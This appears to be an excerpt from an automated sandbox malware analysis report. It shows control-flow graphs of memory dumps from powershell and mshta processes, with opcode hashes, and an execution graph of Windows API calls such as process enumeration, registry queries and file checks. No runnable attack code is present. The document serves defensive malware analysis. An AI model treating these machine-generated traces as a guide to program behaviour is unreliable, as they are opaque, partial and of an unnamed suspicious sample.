• Executed
• Not Executed
control_flow_graph 37 7fe89a98519-7fe89a98539 38 7fe89a98556-7fe89a9855a 37->38 39 7fe89a9853c-7fe89a98554 37->39 40 7fe89a98576-7fe89a985c9 38->40 41 7fe89a9855c-7fe89a98572 38->41 39->38 43 7fe89a98aad-7fe89a98b66 40->43 44 7fe89a985cf-7fe89a985d9 40->44 41->40 45 7fe89a985db-7fe89a985e8 44->45 46 7fe89a985f2-7fe89a985f9 44->46 45->46 48 7fe89a985ea-7fe89a985f0 45->48 49 7fe89a985fb-7fe89a9860e 46->49 50 7fe89a98610 46->50 48->46 51 7fe89a98612-7fe89a98614 49->51 50->51 54 7fe89a98a28-7fe89a98a32 51->54 55 7fe89a9861a-7fe89a98626 51->55 56 7fe89a98a34-7fe89a98a44 54->56 57 7fe89a98a45-7fe89a98a55 54->57 55->43 58 7fe89a9862c-7fe89a98636 55->58 60 7fe89a98a57-7fe89a98a5b 57->60 61 7fe89a98a62-7fe89a98aac 57->61 62 7fe89a98638-7fe89a98645 58->62 63 7fe89a98652-7fe89a98662 58->63 60->61 62->63 64 7fe89a98647-7fe89a98650 62->64 63->54 69 7fe89a98668-7fe89a9869c 63->69 64->63 69->54 74 7fe89a986a2-7fe89a986ae 69->74 74->43 75 7fe89a986b4-7fe89a986be 74->75 76 7fe89a986d7-7fe89a986dc 75->76 77 7fe89a986c0-7fe89a986cd 75->77 76->54 78 7fe89a986e2-7fe89a986e7 76->78 77->76 79 7fe89a986cf-7fe89a986d5 77->79 78->54 80 7fe89a986ed-7fe89a986f2 78->80 79->76 80->54 81 7fe89a986f8-7fe89a98707 80->81 83 7fe89a98709-7fe89a98713 81->83 84 7fe89a98717 81->84 85 7fe89a98715 83->85 86 7fe89a98733-7fe89a987be 83->86 87 7fe89a9871c-7fe89a98729 84->87 85->87 94 7fe89a987c0-7fe89a987cb 86->94 95 7fe89a987d2-7fe89a987f4 86->95 87->86 88 7fe89a9872b-7fe89a98731 87->88 88->86 94->95 96 7fe89a987f6-7fe89a98800 95->96 97 7fe89a98804 95->97 98 7fe89a98820-7fe89a988ae 96->98 99 7fe89a98802 96->99 100 7fe89a98809-7fe89a98816 97->100 107 7fe89a988b0-7fe89a988bb 98->107 108 7fe89a988c2-7fe89a988e0 98->108 99->100 100->98 102 7fe89a98818-7fe89a9881e 100->102 102->98 107->108 109 7fe89a988f0 108->109 110 7fe89a988e2-7fe89a988ec 108->110 113 7fe89a988f5-7fe89a98903 109->113 111 7fe89a9890d-7fe89a9899d 110->111 112 7fe89a988ee 110->112 120 7fe89a989b1-7fe89a98a0a 111->120 121 7fe89a9899f-7fe89a989aa 111->121 112->113 113->111 114 7fe89a98905-7fe89a9890b 113->114 114->111 124 7fe89a98a12-7fe89a98a27 120->124 121->120
Memory Dump Source
• Source File: 00000007.00000002.475254905.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7fe89a90000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d2403c251dbc73ef8ddc6e03f6a505157edf141af2d7fac28bd20ed318353ec3
• Instruction ID: 5f4c880db7279d3cb9cad35b699c4f18f251b1adc8e83878d079f5170d56eceb
• Opcode Fuzzy Hash: d2403c251dbc73ef8ddc6e03f6a505157edf141af2d7fac28bd20ed318353ec3
• Instruction Fuzzy Hash: E922F43090CB894FE799DB2C84506797BE2FF9A344F2441EED48EC72A3DA25AC15C741

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 125 7fe89a94135-7fe89a941c4 126 7fe89a94427-7fe89a944e6 125->126 127 7fe89a941ca-7fe89a941d4 125->127 128 7fe89a941d6-7fe89a941e3 127->128 129 7fe89a941ed-7fe89a941f2 127->129 128->129 132 7fe89a941e5-7fe89a941eb 128->132 130 7fe89a941f8-7fe89a941fb 129->130 131 7fe89a943cb-7fe89a943d5 129->131 134 7fe89a941fd-7fe89a94210 130->134 135 7fe89a94212 130->135 136 7fe89a943d7-7fe89a943e3 131->136 137 7fe89a943e4-7fe89a943f4 131->137 132->129 138 7fe89a94214-7fe89a94216 134->138 135->138 139 7fe89a943f6-7fe89a943fa 137->139 140 7fe89a94401-7fe89a94424 137->140 138->131 143 7fe89a9421c-7fe89a94250 138->143 139->140 140->126 150 7fe89a94267 143->150 151 7fe89a94252-7fe89a94265 143->151 152 7fe89a94269-7fe89a9426b 150->152 151->152 152->131 154 7fe89a94271-7fe89a94279 152->154 154->126 155 7fe89a9427f-7fe89a94289 154->155 156 7fe89a9428b-7fe89a94298 155->156 157 7fe89a942a5-7fe89a942b5 155->157 156->157 158 7fe89a9429a-7fe89a942a3 156->158 157->131 161 7fe89a942bb-7fe89a942ec 157->161 158->157 161->131 164 7fe89a942f2-7fe89a9431e 161->164 166 7fe89a94320-7fe89a94342 164->166 167 7fe89a94344 164->167 168 7fe89a94346-7fe89a94348 166->168 167->168 168->131 169 7fe89a9434e-7fe89a94356 168->169 171 7fe89a94358-7fe89a94362 169->171 172 7fe89a94366 169->172 174 7fe89a94364 171->174 175 7fe89a94382-7fe89a943b1 171->175 176 7fe89a9436b-7fe89a94378 172->176 174->176 179 7fe89a943b8-7fe89a943ca 175->179 176->175 177 7fe89a9437a-7fe89a94380 176->177 177->175
Memory Dump Source
• Source File: 00000007.00000002.475254905.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7fe89a90000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 43be583adbb37e530749bc0bb4a1e08e9d1858f8ca943ac8ba1382489673ff5c
• Instruction ID: 5b32601b0123bee8572b58b9d22997df1f1810b8f1ee83055a32f8d0571bec24
• Opcode Fuzzy Hash: 43be583adbb37e530749bc0bb4a1e08e9d1858f8ca943ac8ba1382489673ff5c
• Instruction Fuzzy Hash: E4C1553091DB9A0FE74AA77C58506BA7FE1FF4A784F1801EAD48EC71A3D618AC15C361

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 181 7fe89a9563d-7fe89a95647 182 7fe89a95649 181->182 183 7fe89a9564e-7fe89a9565f 181->183 182->183 184 7fe89a9564b 182->184 185 7fe89a95666-7fe89a95677 183->185 186 7fe89a95661 183->186 184->183 188 7fe89a95679 185->188 189 7fe89a9567e-7fe89a9568f 185->189 186->185 187 7fe89a95663 186->187 187->185 188->189 190 7fe89a9567b 188->190 191 7fe89a95696-7fe89a956a7 189->191 192 7fe89a95691 189->192 190->189 194 7fe89a956a9 191->194 195 7fe89a956ae-7fe89a956c1 191->195 192->191 193 7fe89a95693 192->193 193->191 194->195 196 7fe89a956ab 194->196 197 7fe89a956de-7fe89a95708 195->197 198 7fe89a956c2 195->198 196->195 200 7fe89a9570a-7fe89a9570c 197->200 201 7fe89a95760-7fe89a9576a 197->201 198->197 199 7fe89a956c4-7fe89a956dd 198->199 199->197 202 7fe89a95770-7fe89a9577a 201->202 203 7fe89a958d3-7fe89a9599c 201->203 204 7fe89a9577c-7fe89a95789 202->204 205 7fe89a95793-7fe89a95798 202->205 204->205 206 7fe89a9578b-7fe89a95791 204->206 207 7fe89a9579e-7fe89a957a1 205->207 208 7fe89a95873-7fe89a9587d 205->208 206->205 212 7fe89a957e6 207->212 213 7fe89a957a3-7fe89a957b2 207->213 210 7fe89a9588e-7fe89a9589e 208->210 211 7fe89a9587f-7fe89a9588d 208->211 214 7fe89a958ab-7fe89a958d0 210->214 215 7fe89a958a0-7fe89a958a4 210->215 216 7fe89a957e8-7fe89a957ea 212->216 213->203 225 7fe89a957b8-7fe89a957c2 213->225 214->203 215->214 216->208 219 7fe89a957f0-7fe89a957f6 216->219 222 7fe89a957f8-7fe89a95805 219->222 223 7fe89a95812-7fe89a95843 219->223 222->223 226 7fe89a95807-7fe89a95810 222->226 235 7fe89a9584a-7fe89a95854 223->235 227 7fe89a957db-7fe89a957e4 225->227 228 7fe89a957c4-7fe89a957d1 225->228 226->223 227->216 228->227 229 7fe89a957d3-7fe89a957d9 228->229 229->227 236 7fe89a9585a-7fe89a95872 235->236
Memory Dump Source
• Source File: 00000007.00000002.475254905.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7fe89a90000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2db887b1ae9236182e548046961c29e420674051bd1f55e66ede302fb8a92f3f
• Instruction ID: e214c11619c4d21d0a8292f976bb89f3587f61366a3bb39e0fbfc5cc3873a7b7
• Opcode Fuzzy Hash: 2db887b1ae9236182e548046961c29e420674051bd1f55e66ede302fb8a92f3f
• Instruction Fuzzy Hash: 0EC1F43080E7C91FD757A7286C156A57FE0FF47260F1911EBD48DCB0A3D619A91AC3A2

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 238 7fe89a90f4b-7fe89a90f96 239 7fe89a91098-7fe89a910c8 238->239 240 7fe89a90f9c-7fe89a90fa6 238->240 248 7fe89a910e9-7fe89a910eb 239->248 249 7fe89a910ca 239->249 241 7fe89a90fa8-7fe89a90fb5 240->241 242 7fe89a90fbf-7fe89a90fee 240->242 241->242 243 7fe89a90fb7-7fe89a90fbd 241->243 242->239 256 7fe89a90ff4-7fe89a90ffe 242->256 243->242 253 7fe89a910ed-7fe89a91124 248->253 251 7fe89a910e6-7fe89a910e8 249->251 252 7fe89a910cc-7fe89a910dc 249->252 251->248 252->253 257 7fe89a910de-7fe89a910e5 252->257 254 7fe89a9112a-7fe89a9119e 253->254 255 7fe89a911c1-7fe89a911cb 253->255 275 7fe89a911a6-7fe89a911be 254->275 260 7fe89a911d8-7fe89a911e8 255->260 261 7fe89a911cd-7fe89a911d7 255->261 258 7fe89a91017-7fe89a91077 256->258 259 7fe89a91000-7fe89a9100d 256->259 257->251 271 7fe89a91079-7fe89a91084 258->271 272 7fe89a9108b-7fe89a91097 258->272 259->258 263 7fe89a9100f-7fe89a91015 259->263 264 7fe89a911ea-7fe89a911ee 260->264 265 7fe89a911f5-7fe89a9121a 260->265 263->258 264->265 271->272 275->255
Memory Dump Source
• Source File: 00000007.00000002.475254905.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7fe89a90000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4c33a27c45e39dd55152a7ca14cb384796b036997d464d3851c8e24517ecec13
• Instruction ID: a35224e8a5fc0dd852c363bf30d2c98f11bf4fa6a3cb03fd823c31c7bd0ff40f
• Opcode Fuzzy Hash: 4c33a27c45e39dd55152a7ca14cb384796b036997d464d3851c8e24517ecec13
• Instruction Fuzzy Hash: 34A1E321A0D7C90FE347933C58642657FE1EF57258B2A00EBC48ECB2B3D9199C5AC362

Control-flow Graph

(rendered control-flow graph omitted: node and edge listing of the figure, basic blocks 7fe89a95711 through 7fe89a9599c, with executed and not-executed blocks marked in the original figure)
Memory Dump Source
• Source File: 00000007.00000002.475254905.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7fe89a90000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 92b0ccf5e7ef81338079fc0dabc379aedafd360589d1f3880bf6f5c45d79452f
• Instruction ID: 2ae59068010bba5a2da6a43d5c0532647aa243228902afaa8e7a12b941e81b6b
• Opcode Fuzzy Hash: 92b0ccf5e7ef81338079fc0dabc379aedafd360589d1f3880bf6f5c45d79452f
• Instruction Fuzzy Hash: AD416631D1CBCA0FE356A72C58513B97FE0FF86654F1920EAC88DC71A3DA25AC168391

Memory Dump Source
• Source File: 00000007.00000002.475254905.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7fe89a90000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5751fa37b8bf67346066c2508a03ebe440285156502c7377ebd27533bf64d32e
• Instruction ID: a180c23f53202944daa4aab35a737c6a9aaf68608d028dafa083a0d69be27d5a
• Opcode Fuzzy Hash: 5751fa37b8bf67346066c2508a03ebe440285156502c7377ebd27533bf64d32e
• Instruction Fuzzy Hash: AEF1372090EBC90FD747A73898246A53FE1EF57254F1A01EBD48DCB1B3D6199D1AC362

Memory Dump Source
• Source File: 00000007.00000002.475254905.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7fe89a90000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 04582941e3ab7a2340c6b2ad06a7b95137007e05c1b495a42e0aff5d0ad64d06
• Instruction ID: 3416949948f66360e815639a5eb11ed785e15423ed4a9d9bdc8fecc5729064fa
• Opcode Fuzzy Hash: 04582941e3ab7a2340c6b2ad06a7b95137007e05c1b495a42e0aff5d0ad64d06
• Instruction Fuzzy Hash: 57B1152080E7C90FE747A77858242A63FF1EF5B254F1A01EBD48DCB1A3D6199D19C362
Memory Dump Source
• Source File: 0000000E.00000003.486972216.0000000002F50000.00000010.00000800.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_3_2f50000_mshta.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
• Instruction ID: 63e5c6e79e49da48900b29d6e64dc1223565d49ace30694e007436321aec22b2
• Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
• Instruction Fuzzy Hash:

Execution Graph

Execution Coverage: 5.5%
Dynamic/Decrypted Code Coverage: 9.2%
Signature Coverage: 2.8%
Total number of Nodes: 2000
Total number of Limit Nodes: 56
(rendered execution graph omitted: node and edge listing of the figure, starting at entry node 4466f4 and annotated with the Windows API calls made from each node)
SetWindowPlacement 38080->38081 38081->37964 38082->37954 38086 40b58d 38083->38086 38085 40b2d1 38085->38028 38087 40b5a4 GetModuleHandleW FindResourceW 38086->38087 38088 40b62e 38086->38088 38089 40b5c2 LoadResource 38087->38089 38091 40b5e7 38087->38091 38088->38085 38090 40b5d0 SizeofResource LockResource 38089->38090 38089->38091 38090->38091 38091->38088 38099 40afcf 38091->38099 38093 40b608 memcpy 38102 40b4d3 memcpy 38093->38102 38095 40b61e 38103 40b3c1 18 API calls 38095->38103 38097 40b626 38104 40b04b 38097->38104 38100 40b04b ??3@YAXPAX 38099->38100 38101 40afd7 ??2@YAPAXI 38100->38101 38101->38093 38102->38095 38103->38097 38105 40b051 ??3@YAXPAX 38104->38105 38106 40b05f 38104->38106 38105->38106 38106->38088 38107->37973 38109 4032c4 38108->38109 38110 40b633 free 38109->38110 38111 403316 38110->38111 38130 44553b 38111->38130 38115 403480 38328 40368c 15 API calls 38115->38328 38117 403489 38118 40b633 free 38117->38118 38119 403495 38118->38119 38119->37975 38120 4033a9 memset memcpy 38121 4033ec wcscmp 38120->38121 38122 40333c 38120->38122 38121->38122 38122->38115 38122->38120 38122->38121 38326 4028e7 11 API calls 38122->38326 38327 40f508 6 API calls 38122->38327 38124 403421 _wcsicmp 38124->38122 38127 444a64 FreeLibrary 38126->38127 38128 444a83 38126->38128 38127->38128 38128->37975 38129->37970 38131 445548 38130->38131 38132 445599 38131->38132 38329 40c768 38131->38329 38133 4455a8 memset 38132->38133 38140 4457f2 38132->38140 38413 403988 38133->38413 38144 445854 38140->38144 38516 403e2d memset memset memset memset memset 38140->38516 38141 445672 38424 403fbe memset memset memset memset memset 38141->38424 38142 4458bb memset memset 38147 414c2e 17 API calls 38142->38147 38192 4458aa 38144->38192 38539 403c9c memset memset memset memset memset 38144->38539 38145 44595e memset memset 38151 414c2e 17 API calls 38145->38151 38146 4455e5 38146->38141 38158 44560f 38146->38158 38152 4458f9 38147->38152 38148 44557a 38188 44558c 
38148->38188 38393 4136c0 38148->38393 38150 445a00 memset memset 38155 414c2e 17 API calls 38150->38155 38156 44599c 38151->38156 38157 40b2cc 27 API calls 38152->38157 38164 445a3e 38155->38164 38166 40b2cc 27 API calls 38156->38166 38167 445909 38157->38167 38169 4087b3 338 API calls 38158->38169 38160 445bca 38168 445c8b memset memset 38160->38168 38229 445cf0 38160->38229 38161 445b38 memset memset memset 38172 445bd4 38161->38172 38173 445b98 38161->38173 38162 445849 38607 40b1ab free free 38162->38607 38179 40b2cc 27 API calls 38164->38179 38174 4459ac 38166->38174 38183 409d1f 6 API calls 38167->38183 38175 414c2e 17 API calls 38168->38175 38184 445621 38169->38184 38171 44589f 38608 40b1ab free free 38171->38608 38562 414c2e 38172->38562 38173->38172 38177 445ba2 38173->38177 38186 409d1f 6 API calls 38174->38186 38187 445cc9 38175->38187 38700 4099c6 wcslen 38177->38700 38178 4456b2 38595 40b1ab free free 38178->38595 38191 445a4f 38179->38191 38182 403335 38325 4452e5 45 API calls 38182->38325 38197 445919 38183->38197 38593 4454bf 20 API calls 38184->38593 38185 445823 38185->38162 38198 4087b3 338 API calls 38185->38198 38200 4459bc 38186->38200 38201 409d1f 6 API calls 38187->38201 38397 444b06 38188->38397 38189 445879 38189->38171 38212 4087b3 338 API calls 38189->38212 38204 409d1f 6 API calls 38191->38204 38192->38142 38216 44594a 38192->38216 38195 445d3d 38224 40b2cc 27 API calls 38195->38224 38196 445d88 memset memset memset 38199 414c2e 17 API calls 38196->38199 38609 409b98 GetFileAttributesW 38197->38609 38198->38185 38209 445dde 38199->38209 38676 409b98 GetFileAttributesW 38200->38676 38211 445ce1 38201->38211 38202 445bb3 38703 445403 memset 38202->38703 38203 445680 38203->38178 38447 4087b3 memset 38203->38447 38214 445a63 38204->38214 38205 40b2cc 27 API calls 38215 445bf3 38205->38215 38207 445928 38207->38216 38610 40b6ef 38207->38610 38217 40b2cc 27 API calls 38209->38217 38720 409b98 GetFileAttributesW 38211->38720 38212->38189 
38222 40b2cc 27 API calls 38214->38222 38578 409d1f wcslen wcslen 38215->38578 38216->38145 38228 4459ed 38216->38228 38227 445def 38217->38227 38218 4459cb 38218->38228 38237 40b6ef 253 API calls 38218->38237 38231 445a94 38222->38231 38234 445d54 _wcsicmp 38224->38234 38226 445665 38594 40b1ab free free 38226->38594 38235 409d1f 6 API calls 38227->38235 38228->38150 38273 445b22 38228->38273 38229->38182 38229->38195 38229->38196 38230 445389 259 API calls 38230->38160 38677 40ae18 38231->38677 38232 44566d 38232->38140 38498 413d4c 38232->38498 38241 445d71 38234->38241 38303 445d67 38234->38303 38244 445e03 38235->38244 38237->38228 38721 445093 23 API calls 38241->38721 38243 44563c 38243->38226 38248 4087b3 338 API calls 38243->38248 38722 409b98 GetFileAttributesW 38244->38722 38245 4456d8 38251 40b2cc 27 API calls 38245->38251 38247 445d83 38247->38182 38248->38243 38250 40b6ef 253 API calls 38250->38182 38256 4456e2 38251->38256 38252 40b2cc 27 API calls 38253 445c23 38252->38253 38258 409d1f 6 API calls 38253->38258 38255 445e12 38263 445e6b 38255->38263 38268 40b2cc 27 API calls 38255->38268 38596 413fa6 _wcsicmp _wcsicmp 38256->38596 38261 445c37 38258->38261 38259 445aa1 38262 445b17 38259->38262 38277 445ab2 memset 38259->38277 38291 409d1f 6 API calls 38259->38291 38299 445389 259 API calls 38259->38299 38684 40add4 38259->38684 38689 40ae51 38259->38689 38260 4456eb 38264 4456fd memset memset memset memset 38260->38264 38265 4457ea 38260->38265 38266 445389 259 API calls 38261->38266 38697 40aebe 38262->38697 38724 445093 23 API calls 38263->38724 38597 409c70 wcscpy wcsrchr 38264->38597 38600 413d29 38265->38600 38272 445c47 38266->38272 38274 445e33 38268->38274 38279 40b2cc 27 API calls 38272->38279 38273->38160 38273->38161 38280 409d1f 6 API calls 38274->38280 38276 445e7e 38281 445f67 38276->38281 38282 40b2cc 27 API calls 38277->38282 38284 445c53 38279->38284 38285 445e47 38280->38285 38286 40b2cc 27 API calls 38281->38286 38282->38259 38283 
409c70 2 API calls 38287 44577e 38283->38287 38288 409d1f 6 API calls 38284->38288 38723 409b98 GetFileAttributesW 38285->38723 38290 445f73 38286->38290 38292 409c70 2 API calls 38287->38292 38293 445c67 38288->38293 38295 409d1f 6 API calls 38290->38295 38291->38259 38296 44578d 38292->38296 38297 445389 259 API calls 38293->38297 38294 445e56 38294->38263 38300 445e83 memset 38294->38300 38298 445f87 38295->38298 38296->38265 38302 40b2cc 27 API calls 38296->38302 38297->38160 38727 409b98 GetFileAttributesW 38298->38727 38299->38259 38304 40b2cc 27 API calls 38300->38304 38305 4457a8 38302->38305 38303->38182 38303->38250 38306 445eab 38304->38306 38307 409d1f 6 API calls 38305->38307 38308 409d1f 6 API calls 38306->38308 38309 4457b8 38307->38309 38310 445ebf 38308->38310 38599 409b98 GetFileAttributesW 38309->38599 38312 40ae18 9 API calls 38310->38312 38321 445ef5 38312->38321 38313 4457c7 38313->38265 38315 4087b3 338 API calls 38313->38315 38314 40ae51 9 API calls 38314->38321 38315->38265 38316 445f5c 38318 40aebe FindClose 38316->38318 38317 40add4 2 API calls 38317->38321 38318->38281 38319 40b2cc 27 API calls 38319->38321 38320 409d1f 6 API calls 38320->38321 38321->38314 38321->38316 38321->38317 38321->38319 38321->38320 38323 445f3a 38321->38323 38725 409b98 GetFileAttributesW 38321->38725 38726 445093 23 API calls 38323->38726 38325->38122 38326->38124 38327->38122 38328->38117 38330 40c775 38329->38330 38728 40b1ab free free 38330->38728 38332 40c788 38729 40b1ab free free 38332->38729 38334 40c790 38730 40b1ab free free 38334->38730 38336 40c798 38337 40aa04 free 38336->38337 38338 40c7a0 38337->38338 38731 40c274 memset 38338->38731 38343 40a8ab 9 API calls 38344 40c7c3 38343->38344 38345 40a8ab 9 API calls 38344->38345 38346 40c7d0 38345->38346 38760 40c3c3 38346->38760 38350 40c877 38359 40bdb0 38350->38359 38351 40c86c 38788 4053fe 39 API calls 38351->38788 38354 40c813 _wcslwr 38786 40c634 50 API calls 38354->38786 38356 40c829 wcslen 38357 
40c7e5 38356->38357 38357->38350 38357->38351 38785 40a706 wcslen memcpy 38357->38785 38787 40c634 50 API calls 38357->38787 38949 404363 38359->38949 38361 40bf5d 38969 40440c 38361->38969 38365 40b2cc 27 API calls 38366 40be02 wcslen 38365->38366 38366->38361 38371 40be1e 38366->38371 38367 40be26 wcsncmp 38367->38371 38370 40be7d memset 38370->38371 38372 40bea7 memcpy 38370->38372 38371->38361 38371->38367 38371->38370 38371->38372 38373 40bf11 wcschr 38371->38373 38374 40b2cc 27 API calls 38371->38374 38376 40bf43 LocalFree 38371->38376 38972 40bd5d 28 API calls 38371->38972 38973 404423 38371->38973 38372->38371 38372->38373 38373->38371 38375 40bef6 _wcsnicmp 38374->38375 38375->38371 38375->38373 38376->38371 38377 4135f7 38988 4135e0 38377->38988 38380 40b2cc 27 API calls 38381 41360d 38380->38381 38382 40a804 8 API calls 38381->38382 38383 413613 38382->38383 38384 41363e 38383->38384 38386 40b273 27 API calls 38383->38386 38385 4135e0 FreeLibrary 38384->38385 38388 413643 38385->38388 38387 413625 GetProcAddress 38386->38387 38387->38384 38389 413648 38387->38389 38388->38148 38390 413658 38389->38390 38391 4135e0 FreeLibrary 38389->38391 38390->38148 38392 413666 38391->38392 38392->38148 38394 4136e2 38393->38394 38395 413827 38394->38395 38396 4137ac CoTaskMemFree 38394->38396 38592 41366b FreeLibrary 38395->38592 38396->38394 38991 4449b9 38397->38991 38400 4449b9 42 API calls 38402 444b4b 38400->38402 38401 444c15 38404 4449b9 42 API calls 38401->38404 38402->38401 39012 444972 GetVersionExW 38402->39012 38405 444c1f 38404->38405 38405->38132 38406 444b99 memcmp 38411 444b8c 38406->38411 38407 444c0b 39016 444a85 42 API calls 38407->39016 38411->38406 38411->38407 39013 444aa5 42 API calls 38411->39013 39014 40a7a0 GetVersionExW 38411->39014 39015 444a85 42 API calls 38411->39015 38414 40399d 38413->38414 39017 403a16 38414->39017 38416 403a09 39031 40b1ab free free 38416->39031 38418 403a12 wcsrchr 38418->38146 38419 4039a3 38419->38416 38422 
4039f4 38419->38422 39028 40a02c CreateFileW 38419->39028 38422->38416 38423 4099c6 2 API calls 38422->38423 38423->38416 38425 414c2e 17 API calls 38424->38425 38426 404048 38425->38426 38427 414c2e 17 API calls 38426->38427 38428 404056 38427->38428 38429 409d1f 6 API calls 38428->38429 38430 404073 38429->38430 38431 409d1f 6 API calls 38430->38431 38432 40408e 38431->38432 38433 409d1f 6 API calls 38432->38433 38434 4040a6 38433->38434 38435 403af5 20 API calls 38434->38435 38436 4040ba 38435->38436 38437 403af5 20 API calls 38436->38437 38438 4040cb 38437->38438 39058 40414f memset 38438->39058 38440 404140 39072 40b1ab free free 38440->39072 38441 4040ec memset 38445 4040e0 38441->38445 38443 404148 38443->38203 38444 4099c6 2 API calls 38444->38445 38445->38440 38445->38441 38445->38444 38446 40a8ab 9 API calls 38445->38446 38446->38445 39085 40a6e6 WideCharToMultiByte 38447->39085 38449 4087ed 39086 4095d9 memset 38449->39086 38452 408953 38452->38203 38453 408809 memset memset memset memset memset 38454 40b2cc 27 API calls 38453->38454 38455 4088a1 38454->38455 38456 409d1f 6 API calls 38455->38456 38457 4088b1 38456->38457 38458 40b2cc 27 API calls 38457->38458 38459 4088c0 38458->38459 38460 409d1f 6 API calls 38459->38460 38461 4088d0 38460->38461 38462 40b2cc 27 API calls 38461->38462 38463 4088df 38462->38463 38464 409d1f 6 API calls 38463->38464 38465 4088ef 38464->38465 38466 40b2cc 27 API calls 38465->38466 38467 4088fe 38466->38467 38468 409d1f 6 API calls 38467->38468 38469 40890e 38468->38469 38470 40b2cc 27 API calls 38469->38470 38471 40891d 38470->38471 38472 409d1f 6 API calls 38471->38472 38473 40892d 38472->38473 39103 409b98 GetFileAttributesW 38473->39103 38475 40893e 38476 408943 38475->38476 38477 408958 38475->38477 38499 40b633 free 38498->38499 38500 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38499->38500 38501 413f00 Process32NextW 38500->38501 38502 413da5 OpenProcess 38501->38502 38503 413f17 CloseHandle 38501->38503 
38504 413eb0 38502->38504 38505 413df3 memset 38502->38505 38503->38245 38504->38501 38507 413ebf free 38504->38507 38508 4099f4 3 API calls 38504->38508 39135 413f27 38505->39135 38507->38504 38508->38504 38509 413e37 GetModuleHandleW 38511 413e46 GetProcAddress 38509->38511 38513 413e1f 38509->38513 38511->38513 38512 413e6a QueryFullProcessImageNameW 38512->38513 38513->38509 38513->38512 39140 413959 38513->39140 39156 413ca4 38513->39156 38515 413ea2 CloseHandle 38515->38504 38517 414c2e 17 API calls 38516->38517 38518 403eb7 38517->38518 38519 414c2e 17 API calls 38518->38519 38520 403ec5 38519->38520 38521 409d1f 6 API calls 38520->38521 38522 403ee2 38521->38522 38523 409d1f 6 API calls 38522->38523 38524 403efd 38523->38524 38525 409d1f 6 API calls 38524->38525 38526 403f15 38525->38526 38527 403af5 20 API calls 38526->38527 38528 403f29 38527->38528 38529 403af5 20 API calls 38528->38529 38530 403f3a 38529->38530 38531 40414f 33 API calls 38530->38531 38537 403f4f 38531->38537 38532 403faf 39170 40b1ab free free 38532->39170 38534 403f5b memset 38534->38537 38535 403fb7 38535->38185 38536 4099c6 2 API calls 38536->38537 38537->38532 38537->38534 38537->38536 38538 40a8ab 9 API calls 38537->38538 38538->38537 38540 414c2e 17 API calls 38539->38540 38541 403d26 38540->38541 38542 414c2e 17 API calls 38541->38542 38543 403d34 38542->38543 38544 409d1f 6 API calls 38543->38544 38545 403d51 38544->38545 38546 409d1f 6 API calls 38545->38546 38547 403d6c 38546->38547 38548 409d1f 6 API calls 38547->38548 38549 403d84 38548->38549 38550 403af5 20 API calls 38549->38550 38551 403d98 38550->38551 38552 403af5 20 API calls 38551->38552 38553 403da9 38552->38553 38554 40414f 33 API calls 38553->38554 38560 403dbe 38554->38560 38555 403e1e 39171 40b1ab free free 38555->39171 38557 403dca memset 38557->38560 38558 403e26 38558->38189 38559 4099c6 2 API calls 38559->38560 38560->38555 38560->38557 38560->38559 38561 40a8ab 9 API calls 38560->38561 38561->38560 38563 
414b81 9 API calls 38562->38563 38564 414c40 38563->38564 38565 414c73 memset 38564->38565 39172 409cea 38564->39172 38567 414c94 38565->38567 39175 414592 RegOpenKeyExW 38567->39175 38570 414c64 SHGetSpecialFolderPathW 38572 414d0b 38570->38572 38571 414cc1 38573 414cf4 wcscpy 38571->38573 39176 414bb0 wcscpy 38571->39176 38572->38205 38573->38572 38575 414cd2 39177 4145ac RegQueryValueExW 38575->39177 38577 414ce9 RegCloseKey 38577->38573 38579 409d62 38578->38579 38580 409d43 wcscpy 38578->38580 38583 445389 38579->38583 38581 409719 2 API calls 38580->38581 38582 409d51 wcscat 38581->38582 38582->38579 38584 40ae18 9 API calls 38583->38584 38586 4453c4 38584->38586 38585 40ae51 9 API calls 38585->38586 38586->38585 38587 4453f3 38586->38587 38589 40add4 2 API calls 38586->38589 38591 445403 254 API calls 38586->38591 38588 40aebe FindClose 38587->38588 38590 4453fe 38588->38590 38589->38586 38590->38252 38591->38586 38592->38188 38593->38243 38594->38232 38595->38232 38596->38260 38598 409c89 38597->38598 38598->38283 38599->38313 38601 413d39 38600->38601 38602 413d2f 